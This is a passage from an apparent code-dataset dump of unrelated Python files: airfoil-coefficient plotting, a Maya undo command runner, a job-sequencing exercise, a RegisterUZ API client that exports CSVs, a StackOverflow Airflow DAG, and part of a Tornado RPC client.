label='SG6043 mod'+str(i))\n ax2.set_ylabel(r\"$C_\\mathrm{lift}$\")\n ax2.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax3.plot(angles, coef[:,2]/coef[:,1], marker='.', label='SG6043 mod'+str(i))\n ax3.set_ylabel(r\"$C_\\mathrm{lift}/C_\\mathrm{drag}$\")\n ax3.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n os.chdir(cwd)\n \"\"\"\n else: \n print(i)\n os.chdir(os.path.join(resultsdir, sweepdir))\n _, coef, angles = getsweepdata(os.getcwd())\n angles = angles[angles!=-6.]\n\n coef = coef[1:-2]\n airdict[\"mod\"+str(i)+\"lift\"] = coef[:,2].tolist().append(0.)\n airdict[\"mod\"+str(i)+\"drag\"] = coef[:,1].tolist().append(0.)\n \n\n ax1.plot(angles, coef[:, 1], marker='.', label='SG6043 mod'+str(i))\n ax1.set_ylabel(r\"$C_\\mathrm{drag}$\")\n ax1.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax2.plot(angles, coef[:,2], marker='.', label='SG6043 mod'+str(i))\n ax2.set_ylabel(r\"$C_\\mathrm{lift}$\")\n ax2.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax3.plot(angles, coef[:,2]/coef[:,1], marker='.', label='SG6043 mod'+str(i))\n ax3.set_ylabel(r\"$C_\\mathrm{lift}/C_\\mathrm{drag}$\")\n ax3.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n os.chdir(cwd)\n \"\"\"\n\n box1 = ax1.get_position()\n ax1.set_position([box1.x0, box1.y0, box1.width * 0.8, box1.height])\n ax1.grid()\n\n # Put a legend to the right of the current axis\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n box2 = ax2.get_position()\n ax2.set_position([box2.x0, box2.y0, box2.width * 0.8, box2.height])\n ax2.grid()\n\n # Put a legend to the right of the current axis\n ax2.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n box3 = ax3.get_position()\n ax3.set_position([box3.x0, box3.y0, box3.width * 0.8, box3.height])\n ax3.grid()\n\n # Put a legend to the right of the current axis\n ax3.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n fig1.savefig(\"modifieddrag.svg\")\n fig2.savefig(\"modifiedlift.svg\")\n fig3.savefig(\"modifiedliftdragratio.svg\")\n \n p = pd.DataFrame(airdict)\n p.to_csv(\"coefs.csv\", float_format=\"%.4f\")\n\nif __name__ == \"__main__\":\n\n try: \n resultsdir = str(sys.argv[1])\n \n except (IndexError, ValueError):\n raise SystemExit\n \n get_coefficients(resultsdir)\n \n","repo_name":"jkhansell/CFDFinalProject","sub_path":"UnstructuredGrids/walls/ValidationNBs/getCSVdata.py","file_name":"getCSVdata.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"37817559604","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains Maya command implementation\n\"\"\"\n\nimport sys\nimport traceback\nfrom typing import Any\n\nfrom overrides import override\nimport maya.cmds as cmds\nimport maya.api.OpenMaya as OpenMaya\n\nfrom tp.core import log, command, exceptions\nfrom tp.maya.cmds import helpers\nfrom tp.maya.api import output\n\nlogger = log.tpLogger\n\n\nclass MayaCommand(command.DccCommand):\n\n    @override\n    def do(self, **kwargs: dict) -> Any:\n        raise NotImplementedError\n\n\nclass MayaCommandRunner(command.BaseCommandRunner):\n    \"\"\"\n    Maya Command runner implementation that allows to inject DCC commands into the Maya undo stack.\n    \"\"\"\n\n    def __init__(self):\n        super().__init__(interface=MayaCommand)\n\n        OpenMaya._COMMAND_RUNNER = None\n        helpers.load_plugin('tpundo.py')\n\n    @override\n    def run(self, command_id: str, **kwargs: dict) -> Any:\n\n        logger.debug(f'Executing command: \"{command_id}\"')\n\n        command_to_run = self.find_command(command_id)\n        if command_to_run is None:\n            raise ValueError(f'No command found with given id \"{command_id}\"')\n\n        if OpenMaya._COMMAND_RUNNER is None:\n            OpenMaya._COMMAND_RUNNER = self\n\n        command_to_run = command_to_run()\n        if not command_to_run.is_enabled:\n            return\n        try:\n            command_to_run.parse_arguments(kwargs)\n            if command_to_run.requires_warning():\n                output.MayaOutput.display_warning(command_to_run.warning_message())\n                return\n        except exceptions.CommandCancel:\n            return\n        except Exception:\n            raise\n\n        exc_tb, exc_type, exc_value = None, None, None\n        command_to_run.stats = command.CommandStats(command_to_run)\n        try:\n            if command_to_run.is_undoable:\n                cmds.undoInfo(openChunk=True, chunkName=command_to_run.id)\n                self._undo_stack.append(command_to_run)\n            OpenMaya._TPDCC_COMMAND = command_to_run\n            cmds.tpDccUndo(id=command_to_run.id)\n            return command_to_run._return_result\n        except exceptions.CommandCancel:\n            command_to_run.stats.finish(None)\n        except Exception:\n            exc_type, exc_value, exc_trace = sys.exc_info()\n            if command_to_run.is_undoable and command_to_run.use_undo_chunk:\n                self._undo_stack.pop()\n            raise\n        finally:\n            tb = None\n            if exc_type and exc_value and exc_tb:\n                tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n            if command_to_run.is_undoable and command_to_run.use_undo_chunk:\n                cmds.undoInfo(closeChunk=True)\n            command_to_run.stats.finish(tb)\n            logger.debug(f'Finished executing command: \"{command_id}\"')\n\n    @override\n    def undo_last(self) -> bool:\n        if not self._undo_stack:\n            return False\n\n        command_to_undo = self._undo_stack[-1]\n        if command_to_undo is None or not command_to_undo.is_undoable:\n            return False\n\n        exc_tb, exc_type, exc_value = None, None, None\n        try:\n            command_to_undo.stats = command.CommandStats(command_to_undo)\n            cmds.undo()\n        except exceptions.CommandCancel:\n            command_to_undo.stats.finish(None)\n            return False\n        except Exception:\n            exc_type, exc_value, exc_tb = sys.exc_info()\n            raise\n        finally:\n            tb = None\n            if exc_type and exc_value and exc_tb:\n                tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n            elif command_to_undo.is_undoable:\n                self._undo_stack.remove(command_to_undo)\n            self._redo_stack.append(command_to_undo)\n            command_to_undo.stats.finish(tb)\n\n        return True\n\n    def redo_last(self) -> Any:\n\n        if not self._redo_stack:\n            return\n\n        result = None\n        command_to_redo = self._redo_stack[-1]\n        if command_to_redo is None:\n            return result\n\n        exc_tb, exc_type, exc_value = None, None, None\n        try:\n            command_to_redo.stats = command.CommandStats(command_to_redo)\n            cmds.redo()\n        except exceptions.CommandCancel:\n            command_to_redo.stats.finish(None)\n            return\n        except Exception:\n            exc_type, exc_value, exc_tb = sys.exc_info()\n            raise\n        finally:\n            tb = None\n            command_to_redo = self._redo_stack.pop()\n            if exc_type and exc_value and exc_tb:\n                tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n            elif command_to_redo.is_undoable:\n                self._undo_stack.append(command_to_redo)\n            command_to_redo.stats.finish(tb)\n\n        return result\n\n    @override\n    def flush(self):\n        super().flush()\n        cmds.flushUndo()\n\n    @override\n    def _run(self, command_to_run: command.DccCommand) -> Any:\n        if OpenMaya.MGlobal.isRedoing():\n            if self._redo_stack:\n                self._redo_stack.pop()\n            result = super()._run(command_to_run)\n            self._undo_stack.append(command_to_run)\n            return result\n        try:\n            return super(MayaCommandRunner, self)._run(command_to_run)\n        except Exception:\n            logger.error(f'Unhandled exception ocurred in command \"{command_to_run.id}\"')\n            raise\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/tp/maya/api/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"1275004370","text":"n = int(input())\narr = []\nprofit = 0\ncount = 0\nm = 0\n\n# inserting tuples!\nfor i in range(n):\n    a,b,c = map(int, input().split())\n    arr.append((a,b,c))\n\n# sorting the tuples based on the deadlines!\nfor i in range(n):\n    for j in range(n-1):\n        if arr[j][1] <= arr[j+1][1]:\n            arr[j],arr[j+1] = arr[j+1],arr[j]\n\nlast_index = 0\nlast_profit = 0\n\nfor i in range(n):\n    if arr[i][1] >= m:\n        m = arr[i][1]\n\n    if arr[i][1] >= m:\n        profit += arr[i][2]\n        count += 1\n        last_index = i\n        last_profit = arr[i][2]\n\nfor i in range(last_index+1,n):\n    if arr[i][2] > last_profit:\n        last_profit = arr[i][2]\n        count += 1\n\nprint(count,last_profit+profit)","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/GeeksforGeeks/Greedy/jobSequencing.py","file_name":"jobSequencing.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"152090767","text":"import json\nimport requests\nimport csv\nimport pandas as pd\nimport datetime\nfrom . import config\nimport asyncio\nimport aiohttp\nfrom aiohttp import ClientSession\nimport time\n\n\n\nasync def get_one(session:ClientSession,URL=None,params=None): \n '''\n Worker function for aiohttp requests\n Parameters:\n CienSession session = generated session check docs at: https://docs.aiohttp.org/en/stable/http_request_lifecycle.html#aiohttp-request-lifecycle\n str URL = URL to make request\n dict params = dictionary of parameters to use\n Return:\n dictionary of data from JSON response\n or Raised error, if some problems with communication or requests\n '''\n try:\n response = await session.request(method='GET', url=URL,params=params)\n response.raise_for_status()\n# print(f\"Response status ({URL}): {response.status}\")\n response_json = await response.json()\n return response_json\n except requests.exceptions.HTTPError as errh:\n raise RuntimeError(errh)\n except requests.exceptions.ConnectionError as errc:\n raise RuntimeError(errc)\n except requests.exceptions.Timeout as errt:\n raise RuntimeError(errt)\n except requests.exceptions.RequestException as err:\n raise RuntimeError(err)\n except json.decoder.JSONDecodeError:\n raise RuntimeError('RegisterUZ get_data: server response is not JSON')\n except Exception as err:\n raise RuntimeError(f\"An error ocurred: {err}\")\n\n\nasync def get_data(URL=None,params=None, IDlist=None):\n '''\n Get data from server - faster version\n Parameters:\n str URL = URL usually it is BASE_URL+SPECIFIC_PART_OF_API\n dict params = dictionary of parameters to pass with URL\n list IDlist = list of ID to get from server, If not used (None) there will be only one request with params\n Return:\n list of dict of collected data\n if used with IDlist=None, one dict in list, to access use index 0\n if used with IDlist, number of dictionaries will be length of IDlist\n '''\n if URL is None or params is None:\n raise ValueError('RegisterUZ get_data: Missing URL or parameters')\n elif IDlist is None:\n# connector = aiohttp.TCPConnector(limit=10)\n async with aiohttp.ClientSession() as session:\n tasks = []\n# for url in urls:\n task = asyncio.ensure_future(get_one(session=session,URL=URL,params=params))\n tasks.append(task)\n res = await asyncio.gather(*tasks,return_exceptions=True)\n return res\n elif IDlist is not None:\n connector = aiohttp.TCPConnector(limit_per_host=100)\n async with aiohttp.ClientSession(connector=connector) as session:\n tasks = []\n for i in IDlist:\n task = asyncio.ensure_future(get_one(session=session,URL=URL,params={\"id\":i}))\n tasks.append(task)\n res = await asyncio.gather(*tasks,return_exceptions=True)\n return res\n\n# old version, not used\ndef get_data_old(URL=None,params=None):\n '''\n Use to get data from RegisterUZ - not used, is slower for big datasets\n Parameters:\n str URL = URL which will accept GET request\n dict params = dictionary of parameters for specific API call\n Return:\n response of data in JSON format or will raise an error\n '''\n if URL is None or params is None:\n raise ValueError('RegisterUZ get_data: Missing URL or parameters')\n else:\n try:\n response = requests.get(url = URL, params = params, timeout=5)\n response.raise_for_status()\n return response.json()\n\n except requests.exceptions.HTTPError as errh:\n raise RuntimeError(errh)\n except requests.exceptions.ConnectionError as errc:\n raise RuntimeError(errc)\n except requests.exceptions.Timeout as errt:\n raise RuntimeError(errt)\n except requests.exceptions.RequestException as err:\n raise RuntimeError(err)\n except json.decoder.JSONDecodeError:\n raise RuntimeError('RegisterUZ get_data: server response is not JSON')\n\ndef write_csv(data, name=\"output\",writing=None, columns=None):\n '''\n Use to save json data to CSV file\n Parameters:\n dict data = data to write\n str name = name of file to which save data e.g. 'uctovne_jednotky', without extension\n '''\n if isinstance(name, int):\n name = str(name)\n if writing is None or columns is None:\n raise ValueError('RegisterUZ write_csv: Missing parameter: writing')\n elif writing is 'one':\n df = pd.DataFrame([data],columns=columns)\n df.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n elif writing is 'list': \n df = pd.DataFrame(data,columns=columns)\n df.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n \n elif writing is 'df': \n data.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n \n\n \ndef is_int(val):\n '''\n Use to check if param val is numeric or not\n Parameters:\n anytype val = data to check\n Return:\n False = if conversion fails (not numeric data) \n True = val is numeric data\n '''\n try:\n num = int(val)\n except ValueError:\n return False\n return True \n\n\ndef uctovna_jednotka(id=0, csv_file=True):\n '''\n Get info about company by ID\n Parameters:\n str or int id = ID of company in database e.g. 302525\n bool csv_file = True to save data into csv with id name e.g. 302525.csv, False to get JSON data\n Return:\n None = No information for this ID\n JSON = information in JSON format if csv_file = False\n '''\n if id is 0:\n raise ValueError('RegisterUZ uctovna jednotka: Missing parameter: id')\n input_params = {\"id\":id}\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNA_JEDNOTKA,input_params))\n d = d[0]\n# d = get_data_old(config.BASE_URL+config.UCTOVNA_JEDNOTKA,input_params)\n \n if 'stav' in d:\n if d['stav'] == config.UCTOVNA_JEDNOTKA_STATUS_DELETED:\n print(f'Returned data for ID: {id} are: {d[\"stav\"]} ')\n return None\n if d is not None and csv_file:\n write_csv(d,name=id,writing=\"one\", columns=config.UCTOVNA_JEDNOTKA_NAMES)\n print(f'CSV was created with name {id}.csv')\n elif d is not None and not csv_file:\n print(f'Returning data associated with ID {id} ')\n return d\n return None\n \n \ndef uctovne_jednotky_id_list(params=None):\n '''\n Use only in function uctovne_jednotky\n Use to get list of IDs based on params\n Parameters:\n dict = dictionary of parameters to filter data\n Return:\n List of IDs returned from API based on params\n '''\n if params is not None:\n res = []\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNE_JEDNOTKY,params))\n d = d[0]\n# d = get_data(config.BASE_URL+config.UCTOVNE_JEDNOTKY,params)\n res = d[\"id\"]\n if d[\"existujeDalsieId\"]:\n maxval = max(d[\"id\"])\n params[\"pokracovat-za-id\"] = maxval\n params[\"max-zaznamov\"] = 10000\n result = uctovne_jednotky_id_list(params)\n res.extend(result)\n return res\n elif not d[\"existujeDalsieId\"]:\n return res\n \n \ndef uctovne_jednotky(zmenene_od=None,pokracovat_za_id=None,max_zaznamov=None,ico=None,dic=None,pravna_forma=None,csv_file=True,csv_name='dataset'):\n '''\n Use to get data about companies, based on parameters\n Parameters:\n str zmenene_od = start date to filter data formats: '%Y-%m-%d', '%Y-%m-%dT%H:%M:%S%z' e.g. '2015-01-01'\n str pokracovat_za_id = optional parameter, start filter from some ID e.g. '1'\n str max_zaznamov = optional parameter, number of ID to get back from request, number in range 1,10000 e.g. '100'\n str ico = optional parameter, (Identifikačné čislo organizácie) Identification number of company in SK e.g. '00691135'\n str dic = optional parameter, (Daňové identifikačté číslo) Tax identification number in SK e.g. '2020216748'\n str pravna_forma = ID of type of object e.g. '601' list at https://www.registeruz.sk/cruz-public/api/pravne-formy\n bool csv_file= True, create csv with filtered objects, False will return only list of IDs from DB\n str csv_name = name of dataset which will be created, default is 'dataset'\n Return:\n list of IDs if param csv_file is set to False or nothing, if csv_file=True to create csv file\n '''\n params = {}\n\n # check zmenene_od\n if zmenene_od is not None: \n valid_time = 0\n for f in config.DATE_TIME_FORMATS:\n try:\n date = datetime.datetime.strptime(zmenene_od, f)\n valid_time+=1\n except ValueError as err:\n pass\n# print(err)\n if valid_time is not 0: \n params[\"zmenene-od\"] = zmenene_od\n else: \n raise ValueError('RegisterUZ uctovne_jednotky: zmenene_od is mandatory or incorrect')\n# params[\"zmenene-od\"] = config.DEFAULT_DATE\n# print(f'Parameter zmenene_od={zmenene_od} nie je spravny')\n# print(f'Skontroluj spravnost alebo')\n# print(f'pouzi jeden z {config.DATE_TIME_FORMATS} formatov')\n# print(f'Hodnota zmenene_od bola nastavena na {config.DEFAULT_DATE}')\n\n # check pokracovat_za_id \n if pokracovat_za_id is not None:\n if is_int(pokracovat_za_id):\n params[\"pokracovat-za-id\"] = pokracovat_za_id\n\n \n # check max_zaznamov\n if max_zaznamov is not None:\n if is_int(max_zaznamov):\n check = lambda x: x > 1 and x <= 10000\n if check(int(max_zaznamov)): \n params[\"max-zaznamov\"] = max_zaznamov\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: max_zaznamov is incorrect')\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: max_zaznamov is incorrect')\n # check ico\n if ico is not None:\n if isinstance(ico,str) and is_int(ico) and len(ico)==8:\n params[\"ico\"] = ico\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: ico is incorrect')\n \n # check dic\n if dic is not None:\n if isinstance(dic,str) and is_int(dic) and len(dic)==10:\n params[\"dic\"] = dic\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: dic is incorrect')\n \n # check pravna_forma\n if pravna_forma is not None:\n if isinstance(pravna_forma,str) and is_int(pravna_forma):\n params[\"pravna-forma\"] = pravna_forma\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: pravna_forma is incorrect')\n \n \n\n # get list of ID to retrieve data for them\n idlist = uctovne_jednotky_id_list(params)\n # if list is empty\n if not idlist: raise ValueError('RegisterUZ uctovne_jednotky: No data found for specified filters')\n \n# print(f'Data of length {len(idlist)} with smallest ID {min(idlist)} and biggest ID {max(idlist)}')\n # some data to save\n if csv_file:\n print(f'Downloading...')\n s = time.time()\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNA_JEDNOTKA,params={},IDlist=idlist))\n \n # pop deleted ID from list, if object was deleted, records looks like https://www.registeruz.sk/cruz-public/api/uctovna-jednotka?id=1956418\n # simply filter records which do not have key 'stav'\n d = [i for i in d if not 'stav' in i]\n\n e = time.time()\n write_csv(d,name=csv_name,writing=\"list\",columns=config.UCTOVNE_JEDNOTKY_NAMES)\n \n print(f'Downloaded in: {e-s:.2f} seconds')\n print(f'CSV was created with name {csv_name}.csv and {len(d)} records')\n\n # slower, not used\n# s = time.time()\n# dataset = []\n# for i in idlist:\n# tmp = uctovna_jednotka(i, csv_file=False)\n# if tmp is not None:\n# dataset.append(tmp)\n# e = time.time()\n# write_csv(dataset,name=\"uctovne_jednotky_data\",writing=\"ujlist\")\n else: \n print(f'Returning sorted list of {len(idlist)} numbers')\n return idlist\n \n \n \n \n##\n## CISELNIKY\n##\ndef pravne_formy(csv_file=True):\n '''\n Get data of: pravne_formy\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.PRAVNE_FORMY,{}))\n if csv_file:\n print(f'returning pravne_formy.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='pravne_formy',writing=\"list\",columns=config.PRAVNE_FORMY_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef sk_nace(csv_file=True):\n '''\n Get data of: sk_nace\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.SK_NACE,{}))\n if csv_file:\n print(f'returning sk_nace.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='sk_nace',writing=\"list\",columns=config.SK_NACE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef druhy_vlastnictva(csv_file=True):\n '''\n Get data of: druhy_vlastnictva\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.DRUHY_VLASTNICTVA,{}))\n if csv_file:\n print(f'returning druhy_vlastnictva.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='druhy_vlastnictva',writing=\"list\",columns=config.DRUHY_VLASTNICTVA_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef velkosti_organizacie(csv_file=True):\n '''\n Get data of: velkosti_organizacie\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.VELKOSTI_ORGANIZACIE,{}))\n if csv_file:\n print(f'returning velkosti_organizacie.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='velkosti_organizacie',writing=\"list\",columns=config.VELKOSTI_ORGANIZACIE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef kraje(csv_file=True):\n '''\n Get data of: kraje\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.KRAJE,{}))\n if csv_file:\n print(f'returning kraje.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='kraje',writing=\"list\",columns=config.KRAJE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef okresy(csv_file=True):\n '''\n Get data of: okresy\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.OKRESY,{}))\n if csv_file:\n print(f'returning okresy.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nadradenaLokacia':d['nadradenaLokacia'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='okresy',writing=\"list\",columns=config.OKRESY_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef sidla(csv_file=True):\n '''\n Get data of: sidla\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.SIDLA,{}))\n if csv_file:\n print(f'returning sidla.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nadradenaLokacia':d['nadradenaLokacia'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='sidla',writing=\"list\",columns=config.SIDLA_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef zdroje_dat(csv_file=True):\n '''\n Get data of: zdroje_dat, no API available\n Exists only in config file, from https://www.registeruz.sk/cruz-public/home/api#datasources\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n if csv_file:\n print(f'returning zdroje_dat.csv')\n write_csv(config.ZDROJE_DAT_TABLE,name='zdroje_dat',writing=\"list\",columns=config.ZDROJE_DAT_NAMES)\n else:\n print(f'returning json data')\n return config.ZDROJE_DAT_TABLE\n ","repo_name":"EObch/project","sub_path":"registeruz/registeruz.py","file_name":"registeruz.py","file_ext":"py","file_size_in_byte":18905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"33763579051","text":"from airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.email import send_email\nfrom datetime import timedelta, datetime\nfrom stackoverflow.get_today_questions import get_today_question_id, parse_question_data\nfrom stackoverflow.load_today_question_data import save_data_to_csv\nfrom stackoverflow.api_keys import STACKOVERFLOW_API_KEY\n\n\nEMAIL = [\"minjiwoo@megazone.com\", \"mjwoo001@gmail.com\"]\ndefault_args = {\n    'owner': 'airflow',\n    'depends_on_past': False,\n    'start_date': datetime(2023,11,20),\n    'email' : EMAIL,\n    'email_on_failure': True,\n    'email_on_retry': True,\n    'retries': 1,\n    'retry_delay': timedelta(minutes=1)\n}\n\ndef success_email_function(context):\n    dag_run = context.get(\"dag_run\")\n    msg = \"DAG ran successfully.\"\n    subject = f\"DAG {dag_run} has completed\"\n    send_email(to=\"minjiwoo@megazone.com\", subject=subject, html_content=msg)\n\ndef failed_email_function(context):\n    dag_run = context.get(\"dag+_run\")\n    msg = \"DAG failed!.\"\n    subject = f\"DAG {dag_run} has failed!\"\n    send_email(to=\"minjiwoo@megazone.com\", subject=subject, html_content=msg)\n\nwith DAG(\n    dag_id = 'stackoverflow_dag',\n    schedule_interval='@daily',\n    start_date=datetime(year=2023, month=11, day=20),\n    catchup=False,\n    on_success_callback=success_email_function,\n    on_failure_callback=failed_email_function,\n    default_args=default_args\n) as dag:\n    task_extract_question_data = PythonOperator(\n        task_id='extract_question_data',\n        python_callable=get_today_question_id,\n        params={'api_key':STACKOVERFLOW_API_KEY},\n        provide_context=True\n    )\n\n    task_transform_question_data = PythonOperator(\n        task_id='transform_question_data',\n        python_callable=parse_question_data,\n        provide_context=True\n    )\n\n    task_save_csv_data = PythonOperator(\n        task_id='save_csv_data',\n        python_callable=save_data_to_csv\n    )\n\n    task_extract_question_data >> task_transform_question_data >> task_save_csv_data\n","repo_name":"freemjstudio/Dashboard-for-Developers","sub_path":"src/dags/stackoverflow_dag.py","file_name":"stackoverflow_dag.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
_ClientConnection(BasicConnection):\n def __init__(self, client, io_loop=None):\n self.client = client\n self.client_config = client.client_config\n self._io_loop = io_loop or IOLoop.current()\n\n self.stream = None\n self._connection_timeout_handler = None\n self._client_connection_tubes = _ClientConnectionTubes(self, self._io_loop)\n # self._client_connection_tubes.thread.start()\n\n def add_item(self, item):\n self._client_connection_tubes.append(item)\n\n def is_avaliable_stream(self):\n return bool(self.stream is not None and not self.stream.closed())\n\n def set_connection_timeout_handler(self, func):\n self._connection_timeout_handler = func\n\n def _off_connection_timeout_handler(self):\n if self._connection_timeout_handler is not None:\n self._io_loop.remove_timeout(self._connection_timeout_handler)\n self.set_connection_timeout_handler(None)\n\n def connect(self):\n self.set_connection_timeout_handler(self._io_loop.add_timeout(\n deadline=self._io_loop.time() + self.client_config.connect_timeout,\n callback=self._on_connection_timeout))\n\n def _connect():\n return self.client.tcp_client.connect(\n host=self.client_config.host, port=self.client_config.port,\n max_buffer_size=self.client_config.max_buffer_size, callback=self._on_connection_success)\n\n #: tcp_client callback\n self._io_loop.run_sync(_connect)\n\n def _on_connection_timeout(self):\n raise RPCConnectionError(\"Connection Timeout {}\".format(self.client_config.address_str))\n\n def _on_connection_success(self, stream):\n self._off_connection_timeout_handler()\n log.debug(u\"Connection Success {}\".format(self.client_config.address_str))\n\n self.stream = stream\n self.stream.set_close_callback(self._on_connection_close)\n\n # Nagle’s algorithm\n self.stream.set_nodelay(True)\n\n #: test\n self.client.ping()\n\n def _on_connection_close(self):\n log.info(\"Connection Timeout {}\".format(self.client_config.address_str))\n\n def close(self):\n if self.is_avaliable_stream():\n self.stream.close()\n self.stream = None\n\n def communicate(self, item):\n if self.is_avaliable_stream():\n self.stream.write(message_utils.encrypt(item))\n\n\nclass _ClientConnectionTubes(object):\n\n def __init__(self, connection, io_loop=None):\n self.connection = connection\n self._io_loop = io_loop or IOLoop.current()\n self.client_config = self.connection.client_config\n\n self.queue = Queue.Queue(self.client_config.max_clients)\n self.active = {}\n self.waiting = {}\n self.thread = _ConnectionThreadingHandler(self._run_item)\n\n def _on_waiting_timeout(self, key):\n log.debug(\"_on_waiting_timeout : {}\".format(self.waiting[key]))\n connection_item, waiting_timeout_handle = self.waiting[key]\n self.queue.remove((key, connection_item))\n del self.waiting[key]\n\n def _off_waiting_timeout(self, key):\n if key in self.waiting:\n _, func = self.waiting[key]\n if func is not None:\n self._io_loop.remove_timeout(func)\n del self.waiting[key]\n\n def append(self, connection_item):\n key = object()\n self.queue.put_nowait((key, connection_item))\n\n if not len(self.active) < self.client_config.max_clients:\n waiting_timeout_handle = self._io_loop.add_timeout(\n deadline=self._io_loop.time() + self.connection_item.waiting_timeout,\n callback=functools.partial(self._on_waiting_timeout, key))\n else:\n waiting_timeout_handle = None\n\n self.waiting[key] = (connection_item, waiting_timeout_handle)\n\n self._run_item()\n\n def _run_item(self):\n while self.queue and len(self.active) < self.client_config.max_clients:\n log.warn(\"^&^^^^^^^^^^^^^^^^^\")\n 
